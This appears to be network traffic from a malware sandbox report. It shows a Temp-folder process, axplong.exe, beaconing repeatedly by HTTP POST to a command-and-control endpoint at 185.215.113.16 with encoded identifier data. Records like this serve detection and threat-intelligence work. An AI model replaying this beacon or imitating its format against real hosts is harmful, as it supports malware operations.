                    Jul 26, 2024 21:03:15.591615915 CEST8049740185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:15.837414980 CEST8049740185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:15.837572098 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.942936897 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.943205118 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.961340904 CEST8049741185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:15.961463928 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.961630106 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.962559938 CEST8049740185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:15.962622881 CEST4974080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:15.966705084 CEST8049741185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:16.775984049 CEST8049741185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:16.776135921 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:16.776843071 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:16.781920910 CEST8049741185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:17.036341906 CEST8049741185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:17.036457062 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.169758081 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.169981003 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.178311110 CEST8049742185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:17.178419113 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.178580046 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.179912090 CEST8049741185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:17.179975033 CEST4974180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.183655024 CEST8049742185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:17.936431885 CEST8049742185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:17.936541080 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.981154919 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:17.986609936 CEST8049742185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:18.231288910 CEST8049742185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:18.231363058 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:18.466262102 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:18.471327066 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:18.472084999 CEST8049742185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:18.472156048 CEST4974280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:18.476654053 CEST8049743185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:18.476717949 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:18.484337091 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:18.489168882 CEST8049743185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:19.281801939 CEST8049743185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:19.281873941 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.282558918 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.287307024 CEST8049743185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:19.533179998 CEST8049743185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:19.533385038 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.644265890 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.644650936 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.649641991 CEST8049744185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:19.649729967 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.649820089 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.653964996 CEST8049743185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:19.654026985 CEST4974380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:19.655246019 CEST8049744185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:20.415177107 CEST8049744185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:20.415257931 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.415987968 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.420816898 CEST8049744185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:20.669310093 CEST8049744185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:20.669485092 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.784693003 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.785032034 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.789984941 CEST8049744185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:20.789998055 CEST8049745185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:20.790064096 CEST4974480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.790091038 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.790211916 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:20.794945955 CEST8049745185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:21.527471066 CEST8049745185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:21.527549028 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.626467943 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.631954908 CEST8049745185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:21.873404026 CEST8049745185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:21.873522997 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.987832069 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.988126040 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.993076086 CEST8049746185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:21.993165970 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.993262053 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.993360043 CEST8049745185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:21.993405104 CEST4974580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:21.998604059 CEST8049746185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:22.774437904 CEST8049746185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:22.774564028 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:22.777517080 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:22.783210993 CEST8049746185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:23.039597988 CEST8049746185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:23.039737940 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.144061089 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.144407988 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.152069092 CEST8049747185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:23.152151108 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.152340889 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.153038025 CEST8049746185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:23.153088093 CEST4974680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.160931110 CEST8049747185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:23.928320885 CEST8049747185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:23.928409100 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.929080009 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:23.933877945 CEST8049747185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:24.176000118 CEST8049747185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:24.176064968 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:24.284713030 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:24.285020113 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:24.289921999 CEST8049748185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:24.290021896 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:24.290128946 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:24.290343046 CEST8049747185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:24.290396929 CEST4974780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:24.294989109 CEST8049748185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:25.029486895 CEST8049748185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:25.029656887 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.030270100 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.035598993 CEST8049748185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:25.291893005 CEST8049748185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:25.291954041 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.395426035 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.395757914 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.401792049 CEST8049748185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:25.401808023 CEST8049749185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:25.401892900 CEST4974880192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.401943922 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.402046919 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:25.407821894 CEST8049749185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:26.158679008 CEST8049749185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:26.158843040 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.159559965 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.164463043 CEST8049749185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:26.409729958 CEST8049749185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:26.409820080 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.519049883 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.519414902 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.526015997 CEST8049750185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:26.526122093 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.526302099 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.526535988 CEST8049749185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:26.526592016 CEST4974980192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:26.531661987 CEST8049750185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:27.286066055 CEST8049750185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:27.286176920 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.286993980 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.292916059 CEST8049750185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:27.545217037 CEST8049750185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:27.545331955 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.661526918 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.661828041 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.668216944 CEST8049751185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:27.668296099 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.668454885 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.668596029 CEST8049750185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:27.668644905 CEST4975080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:27.673496008 CEST8049751185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:28.458842039 CEST8049751185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:28.458940983 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:28.459644079 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:28.464457035 CEST8049751185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:28.716157913 CEST8049751185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:28.716218948 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:28.831686020 CEST4975180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:28.831996918 CEST4975280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:28.871643066 CEST8049752185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:28.871783972 CEST4975280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:28.871984005 CEST4975280192.168.2.7185.215.113.16
                    • 185.215.113.16
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.7 | 49704 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:32.899399996 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:33.652673960 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:33.655378103 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:33.909362078 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.7 | 49705 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:34.029411077 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:34.798254967 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:34.799381018 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:35.084516048 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.7 | 49706 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:35.197519064 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:35.959119081 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:35.960216045 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:36.207797050 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.7 | 49707 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:36.321181059 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:37.109564066 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:37.110645056 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:37.363233089 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.7 | 49708 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:37.483225107 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:38.302417040 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:38.303411007 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:38.560709953 CEST | 196 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.7 | 49709 | 185.215.113.16 | 80 | 7436 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Jul 26, 2024 21:02:38.680986881 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:40.120673895 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:40.121546984 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:40.121624947 CEST | 316 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:40.122200966 CEST | 219 | IN | HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
